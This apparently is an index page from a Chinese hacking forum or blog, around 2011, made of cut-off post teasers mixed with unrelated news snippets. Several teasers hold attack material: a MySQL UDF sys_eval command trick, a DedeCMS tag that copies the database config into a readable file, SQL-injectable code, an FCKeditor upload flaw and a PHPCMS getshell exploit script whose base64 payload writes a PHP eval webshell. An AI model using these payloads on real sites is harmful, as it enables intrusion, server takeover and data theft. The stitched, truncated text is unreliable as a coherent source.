By：zafe 一：     导出的文件名不一定非是xxx.dll，可以试任意的，比如 create function sys_eval returns string soname 'udf.xox'; 二： Can't open shared library 'fun.dll' (errno: 2 )     除了udf不存在、udf被

    By：zafe     遇到可写不可执行的，可执行不可写的站的也许用的上 {dede:php}copy('../data/common.inc.php','../data/cache/test.txt');{/dede:php}     然后去xxx.com/data/cache/test.txt看数据库信

发现论坛很多同学根本不了解这个，还有很多同学无法理解这些内容，或者理解的内容根本就是错误的，这是由于完全不了解HTTP协议导致的，通俗的说就

    转载自：http://hi.baidu.com/micropoor //2011-11-14 星期一  // 程序员的思维：   

    By：Cond0r     第一次挖漏洞，找了个小点得，大牛勿喷 user.action.php 文本第98行： elseif ($act=='repassword') {                        $uid = $db->getOne("SELECT uid FROM $_SC[tablepre]members WHERE email='$_REQUEST[email]'"); //明显的。。。                 if($uid){                 echo $uid;                 $password = random(6);                                

让DOS批处理(cmd命令提示符)发出Beep声音，让 DOS、批处理、CMD、命令提示符 发出 Beep 蜂鸣声音。 做批处理跟据条件分支进行判断，做一些

    By：willweiwei     在六一神棍节末尾发一个代码     此代码可以让该网页IIS用户所属的w3wp进程结束，使网站service unava

    在 t00ls.net 看到个帖子，内容如下（已删除无用回复）： 楼主：原来php的$_SERVER['SERVER_NAME']是可以伪造的： 插，一直以为这个

    转载自：http://hi.baidu.com/micropoor <% if Request.Cookies("xxx")("user")="" or Request.Cookies("xxx")("admin_pass")="" or Request.Cookies("xxx")("admin_class")="" then Response.Cookies("xxx")("user")="" Response.Cookies("xxx")("pass")="" Response.Cookies("xxx")("admin_class")="" response.redirect "ad_login.asp" response.end end if %> '//代码片段--判断身份 <%if rs("admin_class")=0 then response.write" selected"%>>admin <%if

    转自：http://hi.baidu.com/micropoor //2011-11-10 星期四 //程序员的思维：  1.<?php echo '<p>Micropoor.</p>'; ?> //有效 2.<? echo '<p>Micropoor.</p>'; ?>    //有效   /

11月8日消息，据国外媒体报道，加拿大温哥华不列颠哥伦比亚大学四名研究员开发出黑客软件“社交机器人（socialbots）”，成功窃取了Fa

美国弗吉尼亚州有一处没有名称的工业园，园内有一处不起眼的砖砌建筑，那是中央情报局监控海外网络舆情的大本营“开放源中心”。中心主管道格·纳坎近

E-Volo试飞场景 德国人研制出一种新型单人遥控飞行器，上周首次载人试飞，在飞行1分30秒后安全着陆。设计者说，未来它不仅可以走入寻常百姓家

最近，德国发生了一件让人啼笑皆非的事情：一位在博物馆任职的女清洁工在打扫卫生时，“非常认真”地把一个看上去有点脏的盆儿给擦干净了，却不曾想这

    from:90sec.org Micropoor // APP/Controller/Admincp.php     function actionliulan()         {             //管理员资料             $nowindex = $_GET['page'] ? $_GET['page'] :1;             //获取数据查询时从第几条开始取数据             $page = $_GET['page'] ? ($_GET['page']-1)*6 : 0;             //查询数据             $liulan = $this->admin->findAll('','id desc',array(6,$page));             //var_dump($liulan);exit;             //查询

    from:90sec.org Micropoor '\line.asp dim idsd idsd=trim(request("id")) if idsd="" or idsd=0 or not isnumeric(idsd) then     '.略 rs.open "select * from qwbm_line where shenhe=1 and id="& idsd,conn,1,3     if rs.eof and rs.eof then         call titleisnull("您所查找到的信息可能已经删除","","

    from:90sec.org Micropoor //template_edit.php function load_library($curr_template, $lib_name) {     $lib_name = str_replace("0xa", '', $lib_name); // 过滤 0xa 非法字符     if($lib_name == 'style')     {         $lib_file    = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.css';     }     else     {         $lib_file    = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.html';     }     $arr['html'] = str_replace("\xEF\xBB\xBF", '', file_get_contents($lib_file));     return $arr; }     严格说不应该算

#!/usr/bin/python #WordPress SQL Injection Checker v1 #for md5's in the source will use #http responses. #       __  __         ___      ___ #___   __ \/ /______   __ \_____  / #__ | / /_  /_  ___/  / / /  __  / #__ |/ /_  / / /__ / /_/ // /_/ /  #_____/ /_/  \___/ \____/ \__,_/   #   http://www.vyc0d.uni.cc #  vyc0d[at]hackermail[dot]com import sys, urllib2, re, time, httplib #Bad HTTP Responses BAD_RESP = [400,401,404]

by：★黑小子★ 这个程序有格fckeditor 悲剧就在这里了 不过程序他在upload.aspx里面到时验证了权限 任意上传 <%@ Page language="c#" Trace="false" Inherits="FredCK.FCKeditorV2.Uploader" AutoEventWireup="false" StylesheetTheme="" %> 但是

[视频]黑客组织“匿名者”叫阵墨西哥贩毒集团 中新社柏林11月5日电 (记者 黄霜红) 日前在网络轰动一时的“匿名者”黑客组织叫板墨西哥贩毒集团事件

另外一篇文章，Xss高级技巧劫持键盘：http://www.xssxss.com/fuck/285.xss From：http://hi.ba

    首先是：下载求生敢死队活动用的第三方地图图文教程。     目前已知除了这个地图以外：铁证悬案（Cold Case），其他的地图全部按照此方式安装，

题目：Windows系统密码破解全攻略 作者：hackest [H.S.T.] 来源：hackest's blog 此文章已发表在《黑客X档案》2009年第6期杂志上 后经

“美女特工”查普曼出现在FBI公布的监控画面里。图/人民图片 查普曼资料照片。 美国联邦调查局（FBI）10月31日公开一批解密文件、视频和照片

By：★黑小子★ 玩也玩够了，有点鸡肋，会提示此模板没安装等情况..有人发出来了 那老衲也发吧 谷歌批量还需改进 一会儿会补上！ 原文： http://www.wooyun.org/bug.php?action=view&id=2984 测试如下： http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}

    By：Open #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Exploit Google Dork:Powered by Phpcms 2008 code by secr +---------------------------------------------------------------------------+ '); if ($argc < 3) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host:      target server (ip/hostname) path:      path to phpcms Example: php '.$argv[0].' localhost /phpcms/ +---------------------------------------------------------------------------+ ');     exit; } error_reporting(0);  set_time_limit(0); $host = $argv[1]; $path = $argv[2]; $exp ='/yp/product.php?view_type=1&catid=&pagesize={${fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}&areaname=0&order='; /

一眼就可以在CDN服务器群中找出真正主服务器 由于前一段时间比较忙，所以也没有更新，最近抽空更新了下，长安刺客 - 旁注杀手 v1.1 版发布，外加强力新功

Dennis Ritchie  过世了，他发明了C语言，一个影响深远并彻底改变世界的计算机语言。一门经历40多年的到今天还长盛不衰的语言，今天很多语言都受到

据台湾《中国时报》报道，台北士林分局警29日查获一名专偷女性衣裤鞋子，再拿回家中欣赏、自慰的林姓计算机工程师，警方在林家中起出两百多件赃物，

刚刚查点资料，翻到看雪一篇文章，写的还行（作者功力欠佳，从他文章描述来看，他对这方面的知识十分缺乏……），就转过来了，貌似没人怎么关注这个…